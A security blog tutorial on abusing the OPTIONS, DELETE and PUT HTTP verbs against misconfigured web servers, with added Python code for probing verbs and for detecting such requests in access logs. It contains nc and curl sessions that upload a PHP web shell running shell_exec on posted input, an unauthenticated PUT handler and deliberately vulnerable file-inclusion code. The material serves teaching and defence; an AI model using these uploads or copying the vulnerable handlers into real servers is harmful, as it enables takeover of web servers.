HTTP defines a small set of request methods, commonly called verbs: GET, HEAD, POST, PUT, DELETE, OPTIONS, TRACE and CONNECT.
I assume you are already familiar with these; you can read about them in detail in the HTTP/1.1 RFC (RFC 7231, since superseded by RFC 9110).
In this post I will show how a few of these verbs can be abused to break into servers. Misconfigurations like these are fairly rare in practice, but I thought they were worth sharing 🙂
If the OPTIONS verb is enabled on the server, it can be used to list the HTTP methods the server accepts. The Allow header is only what the server claims for the requested path: check it per directory rather than only for /, and verify any risky verb with a real request, because the header can be incomplete or misleading. In the response below the server also advertises TRACE, which should normally be disabled.
% nc localhost 80
OPTIONS / HTTP/1.0

HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/7.5
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
Date: Sun, 14 Jun 2015 05:31:10 GMT
Connection: close
The DELETE verb is dangerous if the server honours it: on a misconfigured server an unauthenticated client can delete resources from the web root. A 200 response on its own does not prove the deletion happened; confirm it with a follow-up GET of the same path and expect a 404.
% nc localhost 80
DELETE /location/resource HTTP/1.0

Date: Sun, 14 Jun 2015 05:01:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=ete39c4b0uk83phvucj1ftbsn5; expires=Mon, 15 Jun 2015 05:01:22 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
The PUT verb can be used to upload a resource to the server, and it is just as risky if it is not configured appropriately. For example, suppose we want to write "<?php echo 'Hello World'; ?>" into a new file called "hello.php". Make sure the Content-Length you send is the exact byte length of the payload: cat -e shows the trailing newline as $, and it counts, and wc -m counts characters rather than bytes, so for anything other than plain ASCII use wc -c instead.
% cat -e hello.php
<?php echo 'Hello World'; ?>$
% wc -m hello.php
29 hello.php
% nc localhost 80
PUT /hello.php HTTP/1.0
Content-Type: text/html
Content-Length: 29

<?php echo 'Hello World'; ?>
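The nc sessions above for OPTIONS, DELETE and PUT take the server's Allow header at its word and count payload bytes by hand. As an added example that is not code from the original post, the following Python script automates the same three checks against a target: it asks OPTIONS, then proves whether PUT and DELETE are actually honoured by writing, reading back and deleting a harmless canary file, and it derives Content-Length from the byte length of the body so a multi-byte payload is never truncated. The target it runs against is a constructed, deliberately permissive in-process server standing in for the misconfigured hosts in the post; its Allow list and the canary path are assumptions of the example.

```python
"""Probe a web server for dangerous HTTP verbs and verify them with a canary.

Added example, not code from the original post. The target is a constructed,
deliberately permissive in-process server standing in for the misconfigured
hosts in the post; the client speaks raw HTTP/1.0 over a socket, like nc does.
"""
import http.server
import socket
import threading

STORE = {}  # path -> bytes; the "web root" of the constructed target

class PermissiveHandler(http.server.BaseHTTPRequestHandler):
    """Constructed target: advertises and honours PUT and DELETE for anyone."""
    protocol_version = "HTTP/1.0"  # one request per connection, as in the nc sessions

    def log_message(self, *args):
        pass  # keep the demo quiet

    def _reply(self, code, body=b""):
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if body:
            self.wfile.write(body)

    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header("Allow", "OPTIONS, GET, HEAD, POST, PUT, DELETE")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_PUT(self):
        STORE[self.path] = self.rfile.read(int(self.headers.get("Content-Length", "0")))
        self._reply(201)

    def do_GET(self):
        body = STORE.get(self.path)
        self._reply(200, body) if body is not None else self._reply(404)

    def do_DELETE(self):
        self._reply(204 if STORE.pop(self.path, None) is not None else 404)

def start_target():
    """Start the constructed target on an ephemeral localhost port; return (host, port)."""
    srv = http.server.ThreadingHTTPServer(("127.0.0.1", 0), PermissiveHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address

def build_request(method, path, host, body=b"", extra_headers=None):
    """Build a raw HTTP/1.0 request. Content-Length is the BYTE length of the body
    (what wc -c reports), not the character count from wc -m; the two differ as
    soon as the payload contains a multi-byte character."""
    lines = [f"{method} {path} HTTP/1.0", f"Host: {host}"]
    for name, value in (extra_headers or {}).items():
        lines.append(f"{name}: {value}")
    if body:
        lines.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii") + body

def raw_request(host, port, method, path, body=b"", extra_headers=None):
    """Send one request the way nc does; return (status, headers, body)."""
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(build_request(method, path, host, body, extra_headers))
        chunks = []
        while data := sock.recv(4096):  # HTTP/1.0: read until the server closes
            chunks.append(data)
    head, _, resp_body = b"".join(chunks).partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(status_line.split()[1]), headers, resp_body

def probe_verbs(host, port, canary="/verb-probe-canary.txt"):
    """Compare what OPTIONS advertises with what the server actually honours.
    The Allow header is only a claim; writing, reading back and deleting a
    harmless canary proves whether PUT and DELETE really work."""
    _, headers, _ = raw_request(host, port, "OPTIONS", "/")
    advertised = {m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()}
    payload = "verb-probe \u2713\n".encode("utf-8")  # 13 characters but 15 bytes
    put_status, _, _ = raw_request(host, port, "PUT", canary, payload, {"Content-Type": "text/plain"})
    get_status, _, body = raw_request(host, port, "GET", canary)
    del_status, _, _ = raw_request(host, port, "DELETE", canary)
    gone_status, _, _ = raw_request(host, port, "GET", canary)
    return {
        "advertised": advertised,
        "put_works": put_status in (200, 201, 204) and get_status == 200 and body == payload,
        "delete_works": del_status in (200, 202, 204) and gone_status == 404,
    }

if __name__ == "__main__":
    target_host, target_port = start_target()
    print(probe_verbs(target_host, target_port))
```

Against a real host (with permission), call probe_verbs with its address instead of start_target(); the canary write followed by its own delete is the lowest-impact way to confirm the verbs, and any mismatch between the advertised set and the two verified flags is exactly the case where trusting OPTIONS alone would have misled you.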
PUT verb in PHP
PHP can read the body of a PUT request from the php://input stream. The following sample script receives the data from a PUT request and saves it as "myfile". Note that it performs no authentication and no validation of what it writes, so anyone who can reach it has an arbitrary file-write primitive on the server.
<?php
// php://input is the raw request body; for a PUT request that is the uploaded content.
$putdata = fopen("php://input", "r");
// Write it to a fixed file name in the current directory: no auth, no content checks.
$fp = fopen("myfile", "w");
while ($data = fread($putdata, 1024))
    fwrite($fp, $data);
fclose($fp);
fclose($putdata);
?>
I will save this as "put.php" in the document root of the web server.
Now we can request "put.php" with the PUT verb and send our payload as the request body.
% cat -e phpinfo.php
<?php phpinfo(); ?>$
% wc -m phpinfo.php
20 phpinfo.php
% nc 192.168.1.5 80
PUT /put.php HTTP/1.0
Content-Type: text/html
Content-Length: 20

<?php phpinfo(); ?>

HTTP/1.1 200 OK
Date: Mon, 15 Jun 2015 06:48:16 GMT
Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
X-Powered-By: PHP/5.4.22
Content-Length: 0
Connection: close
Content-Type: text/html
Now if you view "myfile", our payload should have been written to it.
If the application also has a local file inclusion vulnerability, the file we just wrote with PUT can be included and executed as PHP, since "myfile" sits on the server's filesystem where the include can reach it.
This is an example of vulnerable local file inclusion code; I'll be using DVWA to demonstrate it.
<?php
// Vulnerable on purpose: the "page" parameter is used directly as an include path.
echo "File included: " . $_REQUEST["page"] . "<br>";
$file = $_REQUEST["page"];
include $file;
?>
If we want to upload a simple web shell instead, we can do it like this 😉
% wc -m shell.php
189 shell.php
% nc 192.168.1.5 80
PUT /put.php HTTP/1.0
Content-Type: text/html
Content-Length: 189

<?php print '<form method="post">
Command: <input type="text" name="__"><br>
<input type="submit">
</form>';
if(isset($_POST["__"]))
    print '<pre>'.shell_exec($_POST["__"]).'</pre>';
?>

HTTP/1.1 200 OK
Date: Mon, 15 Jun 2015 07:39:42 GMT
Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
X-Powered-By: PHP/5.4.22
Content-Length: 0
Connection: close
Content-Type: text/html
You can also use curl to upload a file with PUT: --upload-file sends the file as the body of a PUT request and sets Content-Length for you.
% curl http://192.168.1.5/put.php --upload-file shell.php -v
* About to connect() to 192.168.1.5 port 80 (#0)
*   Trying 192.168.1.5...
* connected
* Connected to 192.168.1.5 (192.168.1.5) port 80 (#0)
> PUT /put.php HTTP/1.1
> User-Agent: curl/7.26.0
> Host: 192.168.1.5
> Accept: */*
> Content-Length: 189
> Expect: 100-continue
>
* additional stuff not fine transfer.c:1037: 0 0
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 100 Continue
* additional stuff not fine transfer.c:1037: 0 0
* We are completely uploaded and fine
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 200 OK
< Date: Mon, 15 Jun 2015 07:47:44 GMT
< Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
< X-Powered-By: PHP/5.4.22
< Content-Length: 0
< Content-Type: text/html
<
* Connection #0 to host 192.168.1.5 left intact
* Closing connection #0
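On the defensive side, as an added example that is not part of the original post, the following Python detector flags the kind of traffic these sessions leave in an Apache combined-format access log: accepted PUT or DELETE requests, PUT to a path ending in a script extension, OPTIONS enumeration, and traversal sequences in the request target (the file inclusion step). The log lines are constructed to mirror the sessions above, with made-up client addresses and an assumed include.php path; they are not real captures.

```python
"""Detect write-capable HTTP verbs in web server access logs.

Added example, not part of the original post: the defender's view of the PUT,
DELETE and OPTIONS sessions shown above. The log lines are constructed in
Apache "combined" format to mirror those sessions; they are not real captures.
"""
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}) \S+'
)
# PUT/DELETE plus the WebDAV verbs that also create, move or remove resources.
WRITE_VERBS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|asp|aspx|jsp|cgi|pl)$", re.I)
TRAVERSAL = re.compile(r"\.\.(/|%2f)|%2e%2e(/|%2f)", re.I)

# Constructed sample: the post's sessions as they would appear to the server,
# plus one refused PUT and two lines of ordinary traffic for contrast.
SAMPLE_LOG = """\
192.168.1.10 - - [15/Jun/2015:06:48:16 +0000] "PUT /put.php HTTP/1.0" 200 0 "-" "-"
192.168.1.10 - - [15/Jun/2015:07:39:42 +0000] "PUT /put.php HTTP/1.0" 200 0 "-" "-"
192.168.1.10 - - [15/Jun/2015:07:47:44 +0000] "PUT /put.php HTTP/1.1" 200 0 "-" "curl/7.26.0"
192.168.1.10 - - [15/Jun/2015:07:48:01 +0000] "GET /include.php?page=../../myfile HTTP/1.1" 200 1512 "-" "Mozilla/5.0"
192.168.1.10 - - [15/Jun/2015:07:49:30 +0000] "PUT /hello.php HTTP/1.0" 405 230 "-" "-"
10.0.0.7 - - [14/Jun/2015:05:01:22 +0000] "DELETE /location/resource HTTP/1.0" 200 0 "-" "-"
10.0.0.7 - - [14/Jun/2015:05:31:10 +0000] "OPTIONS / HTTP/1.0" 200 0 "-" "-"
192.168.1.20 - - [15/Jun/2015:08:00:00 +0000] "GET /index.php HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
192.168.1.20 - - [15/Jun/2015:08:00:05 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Map one parsed entry to (severity, reason), or None if it is uninteresting."""
    method, target, status = entry["method"], entry["target"], int(entry["status"])
    path = target.split("?", 1)[0]
    if method == "OPTIONS":
        return ("info", "method enumeration")
    if method in WRITE_VERBS:
        if not 200 <= status < 300:
            return ("low", f"{method} attempted but refused ({status})")
        if method == "PUT" and SCRIPT_EXT.search(path):
            return ("critical", "PUT to a server-side script path accepted")
        return ("high", f"{method} accepted")
    if TRAVERSAL.search(target):
        return ("medium", "path traversal in request, possible file inclusion")
    return None

def detect(log_text):
    """Run the classifier over a whole log; return a list of (severity, reason, entry)."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue  # unparseable line: skip rather than crash the whole run
        verdict = classify(entry)
        if verdict:
            findings.append((*verdict, entry))
    return findings

def severity_counts(findings):
    """Tally findings by severity, e.g. for a quick dashboard number."""
    return Counter(sev for sev, _, _ in findings)

if __name__ == "__main__":
    for sev, reason, e in detect(SAMPLE_LOG):
        print(f"{sev:8} {e['ip']:14} {e['method']:7} {e['target']}  {reason}")
```

A 2xx to a write verb is the signal worth paging on; the refused 405 is still worth keeping as a low-severity record because, as the sessions above show, an attacker who finds PUT blocked on one path will try another.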
Thanks for reading!